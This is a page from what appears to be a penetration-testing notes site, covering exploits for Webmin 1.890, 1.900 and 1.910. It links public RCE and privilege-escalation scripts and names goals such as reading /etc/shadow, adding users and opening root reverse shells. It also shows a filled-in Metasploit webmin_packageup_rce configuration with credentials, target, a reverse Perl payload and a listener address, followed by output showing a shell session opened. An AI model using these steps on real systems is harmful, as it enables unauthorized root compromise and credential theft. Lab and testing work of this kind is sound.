search
githubEdit

Webmin

hashtag
Webmin 1.8.90

  • MiniServ 1.890 (Webmin httpd)

  • https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py

  • Read /etc/shadow

  • Add user

  • Reverse Shells

  • Read the config files

  • Will run as root

hashtag
Webmin 1.900

  • MiniServ 1.900 (Webmin httpd)

  • Requires credentials in order to exploit

  • can use a metasploit module once credentials are obtained 

exploit/linux/http/webmin_packageup_rce
PASSWORD   Password6543     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.1.17      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                         -metasploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   admin            yes       Webmin Username

cmd/unix/reverse_perl
LHOST  10.10.14.2       yes       The listen address (an interface may be specified)
   LPORT  8888             yes       The listen port

run

[*] Started reverse TCP handler on 10.10.14.2:8888 
[+] Session cookie: bda1415ad657230f23aac213aa96a878
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.2:8888 -> 10.10.110.3:10784) at 2024-04-13 21:21:53 -0400

hashtag
Webmin Version 1.910 - Privilege Escalation

  • Authenticated

  • https://github.com/roughiz/Webmin-1.910-Exploit-Script

  • Start your virtual env

  • start your listener

  • Send it

PreviousApache SupersetNextSpring Boot Actuators

Last updated